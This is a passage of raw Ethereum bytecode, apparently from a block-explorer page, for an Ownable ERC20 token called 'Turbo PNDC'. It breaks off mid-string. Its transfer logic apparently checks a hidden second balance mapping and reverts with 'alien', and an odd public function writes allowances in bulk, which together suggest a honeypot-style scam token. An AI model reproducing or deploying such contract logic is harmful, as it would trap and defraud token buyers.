006200041b6200037b565b9050620004298282620003d9565b919050565b600067ffffffffffffffff8211156200044c576200044b620003aa565b5b620004578262000399565b9050602081019050919050565b60005b838110156200048457808201518184015260208101905062000467565b60008484015250505050565b6000620004a7620004a1846200042e565b6200040f565b905082815260208101848484011115620004c657620004c562000394565b5b620004d384828562000464565b509392505050565b600082601f830112620004f357620004f26200038f565b5b81516200050584826020860162000490565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006200053b826200050e565b9050919050565b6200054d816200052e565b81146200055957600080fd5b50565b6000815190506200056d8162000542565b92915050565b6000819050919050565b620005888162000573565b81146200059457600080fd5b50565b600081519050620005a8816200057d565b92915050565b60008060008060808587031215620005cb57620005ca62000385565b5b600085015167ffffffffffffffff811115620005ec57620005eb6200038a565b5b620005fa87828801620004db565b945050602085015167ffffffffffffffff8111156200061e576200061d6200038a565b5b6200062c87828801620004db565b93505060406200063f878288016200055c565b9250506060620006528782880162000597565b91505092959194509250565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620006b157607f821691505b602082108103620006c757620006c662000669565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007317fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620006f2565b6200073d8683620006f2565b95508019841693508086168417925050509392505050565b6000819050919050565b6000620007806200077a620007748462000573565b62000755565b62000573565b9050919050565b6000819050919050565b6200079c836200075f565b620007b4620007ab8262000787565b848454620006ff565b825550505050565b600090565b620007cb620007bc565b620007d881848462000791565b505050565b5b818110156200080057620007f4600082620007c1565b600181019050620007de565b5050565b601f8211156200084f576200081981620006cd565b6200082484620006e2565b8101602085101562000834578190505b6200084c6200084385620006e2565b830182620007dd565b50505b505050565b600082821c905092915050565b6000620008746000198460080262000854565b1980831691505092915050565b60006200088f838362000861565b9150826002028217905092915050565b620008aa826200065e565b67ffffffffffffffff811115620008c657620008c5620003aa565b5b620008d2825462000698565b620008df82828562000804565b600060209050601f83116001811462000917576000841562000902578287015190505b6200090e858262000881565b8655506200097e565b601f1984166200092786620006cd565b60005b8281101562000951578489015182556001820191506020850194506020810190506200092a565b868310156200097157848901516200096d601f89168262000861565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000a1457808604811115620009ec57620009eb62000986565b5b6001851615620009fc5780820291505b808102905062000a0c85620009b5565b9450620009cc565b94509492505050565b60008262000a2f576001905062000b02565b8162000a3f576000905062000b02565b816001811462000a58576002811462000a635762000a99565b600191505062000b02565b60ff84111562000a785762000a7762000986565b5b8360020a91508482111562000a925762000a9162000986565b5b5062000b02565b5060208310610133831016604e8410600b841016171562000ad35782820a90508381111562000acd5762000acc62000986565b5b62000b02565b62000ae28484846001620009c2565b9250905081840481111562000afc5762000afb62000986565b5b81810290505b9392505050565b600060ff82169050919050565b600062000b238262000573565b915062000b308362000b09565b925062000b5f7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000a1d565b905092915050565b600062000b748262000573565b915062000b818362000573565b925082820262000b918162000573565b9150828204841483151762000bab5762000baa62000986565b5b5092915050565b62000bbd8162000573565b82525050565b600060208201905062000bda600083018462000bb2565b92915050565b62000beb816200052e565b82525050565b600060408201905062000c08600083018562000bb2565b62000c17602083018462000be0565b9392505050565b600062000c2b8262000573565b915062000c388362000573565b925082820190508082111562000c535762000c5262000986565b5b92915050565b611d388062000c696000396000f3fe608060405234801561001057600080fd5b50600436106100ea5760003560e01c8063715018a61161008c5780639ebbaef7116100665780639ebbaef71461024f578063a9059cbb1461027f578063dd62ed3e146102af578063f2fde38b146102df576100ea565b8063715018a6146102095780638da5cb5b1461021357806395d89b4114610231576100ea565b806318160ddd116100c857806318160ddd1461016d57806323b872dd1461018b578063313ce567146101bb57806370a08231146101d9576100ea565b806306fdde03146100ef578063070d18f41461010d578063095ea7b31461013d575b600080fd5b6100f76102fb565b6040516101049190611257565b60405180910390f35b610127600480360381019061012291906112eb565b61038d565b6040516101349190611331565b60405180910390f35b61015760048036038101906101529190611378565b6103d9565b60405161016491906113d3565b60405180910390f35b6101756103f0565b6040516101829190611331565b60405180910390f35b6101a560048036038101906101a091906113ee565b6103fa565b6040516101b291906113d3565b60405180910390f35b6101c36104c5565b6040516101d0919061145d565b60405180910390f35b6101f360048036038101906101ee91906112eb565b6104dc565b6040516102009190611331565b60405180910390f35b610211610525565b005b61021b6105a6565b6040516102289190611487565b60405180910390f35b6102396105cf565b6040516102469190611257565b60405180910390f35b610269600480360381019061026491906115ea565b610661565b60405161027691906113d3565b60405180910390f35b61029960048036038101906102949190611378565b6107f1565b6040516102a691906113d3565b60405180910390f35b6102c960048036038101906102c49190611646565b610808565b6040516102d69190611331565b60405180910390f35b6102f960048036038101906102f491906112eb565b61088f565b005b60606006805461030a906116b5565b80601f0160208091040260200160405190810160405280929190818152602001828054610336906116b5565b80156103835780601f1061035857610100808354040283529160200191610383565b820191906000526020600020905b81548152906001019060200180831161036657829003601f168201915b5050505050905090565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600001549050919050565b60006103e633848461097f565b6001905092915050565b6000600954905090565b6000610407848484610b48565b6104ba84336104b585604051806060016040528060288152602001611cdb60289139600260008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e649092919063ffffffff16565b61097f565b600190509392505050565b6000600860009054906101000a900460ff16905090565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b3373ffffffffffffffffffffffffffffffffffffffff166105446105a6565b73ffffffffffffffffffffffffffffffffffffffff161461059a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161059190611732565b60405180910390fd5b6105a46000610eb9565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600780546105de906116b5565b80601f016020809104026020016040519081016040528092919081815260200182805461060a906116b5565b80156106575780601f1061062c57610100808354040283529160200191610657565b820191906000526020600020905b81548152906001019060200180831161063a57829003601f168201915b5050505050905090565b600080339050600062010fd79050600060078261067e91906117b0565b90506000600e60028461069191906117b0565b61069b91906117e1565b826106a69190611823565b90506000805b88518110156107e15780826106c19190611823565b91506106e8868a83815181106106da576106d9611857565b5b60200260200101518a610f7d565b87600260008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055503073ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258a6040516107c69190611331565b60405180910390a380806107d990611886565b9150506106ac565b5060019550505050505092915050565b60006107fe338484610b48565b6001905092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b3373ffffffffffffffffffffffffffffffffffffffff166108ae6105a6565b73ffffffffffffffffffffffffffffffffffffffff1614610904576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108fb90611732565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610973576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161096a90611940565b60405180910390fd5b61097c81610eb9565b50565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109ee576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109e5906119d2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a5d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a5490611a64565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b3b9190611331565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610bb7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bae90611af6565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c26576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c1d90611b88565b60405180910390fd5b6000600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000015482610c769190611ba8565b11610cb6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cad90611c28565b60405180910390fd5b610d2281604051806060016040528060268152602001611cb560269139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e649092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610db781600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546111b190919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610e579190611331565b60405180910390a3505050565b6000838311158290610eac576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ea39190611257565b60405180910390fd5b5082840390509392505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610fed576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fe490611c94565b60405180910390fd5b600460000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16146110fc5780600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282546110979190611ba8565b9250508190555080600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282546110f09190611823565b925050819055506111ab565b80600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600001600082825461114e9190611ba8565b9250508190555081816111619190611823565b905080600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600001819055505b50505050565b600081836111bf9190611823565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b838110156112015780820151818401526020810190506111e6565b60008484015250505050565b6000601f19601f8301169050919050565b6000611229826111c7565b61123381856111d2565b93506112438185602086016111e3565b61124c8161120d565b840191505092915050565b60006020820190508181036000830152611271818461121e565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006112b88261128d565b9050919050565b6112c8816112ad565b81146112d357600080fd5b50565b6000813590506112e5816112bf565b92915050565b60006020828403121561130157611300611283565b5b600061130f848285016112d6565b91505092915050565b6000819050919050565b61132b81611318565b82525050565b60006020820190506113466000830184611322565b92915050565b61135581611318565b811461136057600080fd5b50565b6000813590506113728161134c565b92915050565b6000806040838503121561138f5761138e611283565b5b600061139d858286016112d6565b92505060206113ae85828601611363565b9150509250929050565b60008115159050919050565b6113cd816113b8565b82525050565b60006020820190506113e860008301846113c4565b92915050565b60008060006060848603121561140757611406611283565b5b6000611415868287016112d6565b9350506020611426868287016112d6565b925050604061143786828701611363565b9150509250925092565b600060ff82169050919050565b61145781611441565b82525050565b6000602082019050611472600083018461144e565b92915050565b611481816112ad565b82525050565b600060208201905061149c6000830184611478565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6114df8261120d565b810181811067ffffffffffffffff821117156114fe576114fd6114a7565b5b80604052505050565b6000611511611279565b905061151d82826114d6565b919050565b600067ffffffffffffffff82111561153d5761153c6114a7565b5b602082029050602081019050919050565b600080fd5b600061156661156184611522565b611507565b905080838252602082019050602084028301858111156115895761158861154e565b5b835b818110156115b2578061159e88826112d6565b84526020840193505060208101905061158b565b5050509392505050565b600082601f8301126115d1576115d06114a2565b5b81356115e1848260208601611553565b91505092915050565b6000806040838503121561160157611600611283565b5b600083013567ffffffffffffffff81111561161f5761161e611288565b5b61162b858286016115bc565b925050602061163c85828601611363565b9150509250929050565b6000806040838503121561165d5761165c611283565b5b600061166b858286016112d6565b925050602061167c858286016112d6565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806116cd57607f821691505b6020821081036116e0576116df611686565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061171c6020836111d2565b9150611727826116e6565b602082019050919050565b6000602082019050818103600083015261174b8161170f565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006117bb82611318565b91506117c683611318565b9250826117d6576117d5611752565b5b828204905092915050565b60006117ec82611318565b91506117f783611318565b925082820261180581611318565b9150828204841483151761181c5761181b611781565b5b5092915050565b600061182e82611318565b915061183983611318565b925082820190508082111561185157611850611781565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600061189182611318565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036118c3576118c2611781565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061192a6026836111d2565b9150611935826118ce565b604082019050919050565b600060208201905081810360008301526119598161191d565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006119bc6024836111d2565b91506119c782611960565b604082019050919050565b600060208201905081810360008301526119eb816119af565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611a4e6022836111d2565b9150611a59826119f2565b604082019050919050565b60006020820190508181036000830152611a7d81611a41565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611ae06025836111d2565b9150611aeb82611a84565b604082019050919050565b60006020820190508181036000830152611b0f81611ad3565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611b726023836111d2565b9150611b7d82611b16565b604082019050919050565b60006020820190508181036000830152611ba181611b65565b9050919050565b6000611bb382611318565b9150611bbe83611318565b9250828203905081811115611bd657611bd5611781565b5b92915050565b7f616c69656e000000000000000000000000000000000000000000000000000000600082015250565b6000611c126005836111d2565b9150611c1d82611bdc565b602082019050919050565b60006020820190508181036000830152611c4181611c05565b9050919050565b7f696e76616c696420616464726573730000000000000000000000000000000000600082015250565b6000611c7e600f836111d2565b9150611c8982611c48565b602082019050919050565b60006020820190508181036000830152611cad81611c71565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220c1ca4a3365e2559880db811ebd15bfbb5b0c7f68ece1b44df183dbb8db8acad664736f6c63430008130033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000af7772be0190b4fe6e2eaca54b28c7954a9a3b9d000000000000000000000000000000000000000000000000000000003b9aca00000000000000000000000000000000000000000000000000000000000000000a547572626f20504e4443000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004504e444300000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100ea5760003560e01c8063715018a61161008c5780639ebbaef7116100665780639ebbaef71461024f578063a9059cbb1461027f578063dd62ed3e146102af578063f2fde38b146102df576100ea565b8063715018a6146102095780638da5cb5b1461021357806395d89b4114610231576100ea565b806318160ddd116100c857806318160ddd1461016d57806323b872dd1461018b578063313ce567146101bb57806370a08231146101d9576100ea565b806306fdde03146100ef578063070d18f41461010d578063095ea7b31461013d575b600080fd5b6100f76102fb565b6040516101049190611257565b60405180910390f35b610127600480360381019061012291906112eb565b61038d565b6040516101349190611331565b60405180910390f35b61015760048036038101906101529190611378565b6103d9565b60405161016491906113d3565b60405180910390f35b6101756103f0565b6040516101829190611331565b60405180910390f35b6101a560048036038101906101a091906113ee565b6103fa565b6040516101b291906113d3565b60405180910390f35b6101c36104c5565b6040516101d0919061145d565b60405180910390f35b6101f360048036038101906101ee91906112eb565b6104dc565b6040516102009190611331565b60405180910390f35b610211610525565b005b61021b6105a6565b6040516102289190611487565b60405180910390f35b6102396105cf565b6040516102469190611257565b60405180910390f35b610269600480360381019061026491906115ea565b610661565b60405161027691906113d3565b60405180910390f35b61029960048036038101906102949190611378565b6107f1565b6040516102a691906113d3565b60405180910390f35b6102c960048036038101906102c49190611646565b610808565b6040516102d69190611331565b60405180910390f35b6102f960048036038101906102f491906112eb565b61088f565b005b60606006805461030a906116b5565b80601f0160208091040260200160405190810160405280929190818152602001828054610336906116b5565b80156103835780601f1061035857610100808354040283529160200191610383565b820191906000526020600020905b81548152906001019060200180831161036657829003601f168201915b5050505050905090565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600001549050919050565b60006103e633848461097f565b6001905092915050565b6000600954905090565b6000610407848484610b48565b6104ba84336104b585604051806060016040528060288152602001611cdb60289139600260008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e649092919063ffffffff16565b61097f565b600190509392505050565b6000600860009054906101000a900460ff16905090565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b3373ffffffffffffffffffffffffffffffffffffffff166105446105a6565b73ffffffffffffffffffffffffffffffffffffffff161461059a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161059190611732565b60405180910390fd5b6105a46000610eb9565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600780546105de906116b5565b80601f016020809104026020016040519081016040528092919081815260200182805461060a906116b5565b80156106575780601f1061062c57610100808354040283529160200191610657565b820191906000526020600020905b81548152906001019060200180831161063a57829003601f168201915b5050505050905090565b600080339050600062010fd79050600060078261067e91906117b0565b90506000600e60028461069191906117b0565b61069b91906117e1565b826106a69190611823565b90506000805b88518110156107e15780826106c19190611823565b91506106e8868a83815181106106da576106d9611857565b5b60200260200101518a610f7d565b87600260008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055503073ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258a6040516107c69190611331565b60405180910390a380806107d990611886565b9150506106ac565b5060019550505050505092915050565b60006107fe338484610b48565b6001905092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b3373ffffffffffffffffffffffffffffffffffffffff166108ae6105a6565b73ffffffffffffffffffffffffffffffffffffffff1614610904576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108fb90611732565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610973576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161096a90611940565b60405180910390fd5b61097c81610eb9565b50565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109ee576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109e5906119d2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a5d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a5490611a64565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b3b9190611331565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610bb7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bae90611af6565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c26576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c1d90611b88565b60405180910390fd5b6000600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000015482610c769190611ba8565b11610cb6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cad90611c28565b60405180910390fd5b610d2281604051806060016040528060268152602001611cb560269139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e649092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610db781600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546111b190919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610e579190611331565b60405180910390a3505050565b6000838311158290610eac576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ea39190611257565b60405180910390fd5b5082840390509392505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610fed576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fe490611c94565b60405180910390fd5b600460000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16146110fc5780600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282546110979190611ba8565b9250508190555080600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282546110f09190611823565b925050819055506111ab565b80600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600001600082825461114e9190611ba8565b9250508190555081816111619190611823565b905080600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600001819055505b50505050565b600081836111bf9190611823565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b838110156112015780820151818401526020810190506111e6565b60008484015250505050565b6000601f19601f8301169050919050565b6000611229826111c7565b61123381856111d2565b93506112438185602086016111e3565b61124c8161120d565b840191505092915050565b60006020820190508181036000830152611271818461121e565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006112b88261128d565b9050919050565b6112c8816112ad565b81146112d357600080fd5b50565b6000813590506112e5816112bf565b92915050565b60006020828403121561130157611300611283565b5b600061130f848285016112d6565b91505092915050565b6000819050919050565b61132b81611318565b82525050565b60006020820190506113466000830184611322565b92915050565b61135581611318565b811461136057600080fd5b50565b6000813590506113728161134c565b92915050565b6000806040838503121561138f5761138e611283565b5b600061139d858286016112d6565b92505060206113ae85828601611363565b9150509250929050565b60008115159050919050565b6113cd816113b8565b82525050565b60006020820190506113e860008301846113c4565b92915050565b60008060006060848603121561140757611406611283565b5b6000611415868287016112d6565b9350506020611426868287016112d6565b925050604061143786828701611363565b9150509250925092565b600060ff82169050919050565b61145781611441565b82525050565b6000602082019050611472600083018461144e565b92915050565b611481816112ad565b82525050565b600060208201905061149c6000830184611478565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6114df8261120d565b810181811067ffffffffffffffff821117156114fe576114fd6114a7565b5b80604052505050565b6000611511611279565b905061151d82826114d6565b919050565b600067ffffffffffffffff82111561153d5761153c6114a7565b5b602082029050602081019050919050565b600080fd5b600061156661156184611522565b611507565b905080838252602082019050602084028301858111156115895761158861154e565b5b835b818110156115b2578061159e88826112d6565b84526020840193505060208101905061158b565b5050509392505050565b600082601f8301126115d1576115d06114a2565b5b81356115e1848260208601611553565b91505092915050565b6000806040838503121561160157611600611283565b5b600083013567ffffffffffffffff81111561161f5761161e611288565b5b61162b858286016115bc565b925050602061163c85828601611363565b9150509250929050565b6000806040838503121561165d5761165c611283565b5b600061166b858286016112d6565b925050602061167c858286016112d6565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806116cd57607f821691505b6020821081036116e0576116df611686565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061171c6020836111d2565b9150611727826116e6565b602082019050919050565b6000602082019050818103600083015261174b8161170f565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006117bb82611318565b91506117c683611318565b9250826117d6576117d5611752565b5b828204905092915050565b60006117ec82611318565b91506117f783611318565b925082820261180581611318565b9150828204841483151761181c5761181b611781565b5b5092915050565b600061182e82611318565b915061183983611318565b925082820190508082111561185157611850611781565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600061189182611318565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036118c3576118c2611781565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061192a6026836111d2565b9150611935826118ce565b604082019050919050565b600060208201905081810360008301526119598161191d565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006119bc6024836111d2565b91506119c782611960565b604082019050919050565b600060208201905081810360008301526119eb816119af565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611a4e6022836111d2565b9150611a59826119f2565b604082019050919050565b60006020820190508181036000830152611a7d81611a41565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611ae06025836111d2565b9150611aeb82611a84565b604082019050919050565b60006020820190508181036000830152611b0f81611ad3565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611b726023836111d2565b9150611b7d82611b16565b604082019050919050565b60006020820190508181036000830152611ba181611b65565b9050919050565b6000611bb382611318565b9150611bbe83611318565b9250828203905081811115611bd657611bd5611781565b5b92915050565b7f616c69656e000000000000000000000000000000000000000000000000000000600082015250565b6000611c126005836111d2565b9150611c1d82611bdc565b602082019050919050565b60006020820190508181036000830152611c4181611c05565b9050919050565b7f696e76616c696420616464726573730